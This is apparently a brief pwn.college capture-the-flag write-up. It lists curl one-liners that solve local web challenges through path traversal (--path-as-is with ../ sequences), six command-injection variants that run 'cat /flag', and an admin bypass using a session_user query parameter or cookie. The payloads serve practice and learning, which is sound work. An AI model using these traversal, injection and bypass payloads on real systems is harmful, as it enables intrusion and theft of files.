PwnCollege - curl injection

Posted on In Views: Disqus:

path traversal

--path-as-is prevents curl from normalizing ../ sequences.

1
2
3
4
5
# path-traversal-1
curl --path-as-is "http://challenge.localhost:80/filesystem/../../../../../../../flag"

# path-traversal-2
curl --path-as-is "http://challenge.localhost:80/data/fortunes/../../../../../../flag"

command injection

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# cmdi 1 - semicolon
curl -G "http://challenge.localhost:80/serve" --data-urlencode "top-path=;cat /flag"

# cmdi 2 - ampersand
curl -G "http://challenge.localhost:80/objective" --data-urlencode "filepath=&cat /flag"

# cmdi 3 - quote escape + comment
curl -G "http://challenge.localhost:80/test" --data-urlencode "top-path='; cat /flag; #"

# cmdi 4 - space-separated injection
curl -G "http://challenge.localhost:80/stage" --data-urlencode "tzone=a cat /flag;"

# cmdi 5 - blind (no direct output), redirect to file
curl -G "http://challenge.localhost:80/activity" \
  --data-urlencode "file-loc=; cat /flag > /tmp/flag_out"
cat /tmp/flag_out

# cmdi 6 - newline injection
curl "http://challenge.localhost:80/exercise?root=%0acat%20/flag"

authentication bypass

1
2
3
4
5
# query parameter
curl "http://challenge.localhost:80/?session_user=admin"

# cookie
curl "http://challenge.localhost:80/" --cookie "session_user=admin"